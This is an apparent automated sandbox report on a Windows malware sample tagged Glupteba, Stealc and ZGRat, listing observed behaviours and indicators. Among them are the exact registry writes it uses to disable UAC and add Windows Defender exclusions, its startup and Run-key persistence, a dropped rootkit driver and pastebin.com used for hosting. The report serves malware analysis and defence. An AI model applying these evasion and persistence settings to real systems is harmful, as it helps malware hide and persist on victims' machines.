Malware Analysis Report

2024-11-30 20:07

Sample ID 240508-3wxa6aef8z
Target ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620
SHA256 ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620
Tags
glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620

Threat Level: Known bad

The file ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620 was found to be: Known bad.

Malicious Activity Summary

glupteba stealc zgrat discovery dropper evasion execution loader persistence rat rootkit stealer trojan upx

Glupteba

UAC bypass

ZGRat

Detect ZGRat V1

Glupteba payload

Windows security bypass

Stealc

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Modifies Windows Firewall

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Drops startup file

Windows security modification

Executes dropped EXE

UPX packed file

Loads dropped DLL

Manipulates WinMon driver.

Adds Run key to start application

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Checks installed software on the system

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Enumerates physical storage devices

Program crash

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

System policy modification

GoLang User-Agent

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 23:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 23:52

Reported

2024-05-08 23:57

Platform

win7-20240508-en

Max time kernel

298s

Max time network

291s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b6qsLfkqIoTPwoWsUv6y5Cxm.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e9ZoIBhiec9y0MQ8LN1Ew4A7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7thwCggTlPUkHNTYhfDZ8bBD.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8kdfOL5pS2ZJD6XKGWDerABo.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9X5eQ89hOsyIn0HVfNoLbArx.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qFp7wCxROjWfnJ9EWLOFXkId.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRQGxNAaydztbjZ2MhKqsJyR.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DgEQpmig2k2u8ahd5cM0IXOL.exe = "0" C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\yNIUqrzSFbniO7QgiDNi1e5u.exe = "0" C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\2U5ElIDy3tFD0tPHgA1ebjtp.exe = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JziJRjwTPjmAIVQ7YR4wEkVF.exe = "0" C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2604 set thread context of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240508235243.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-441 = "Arabian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
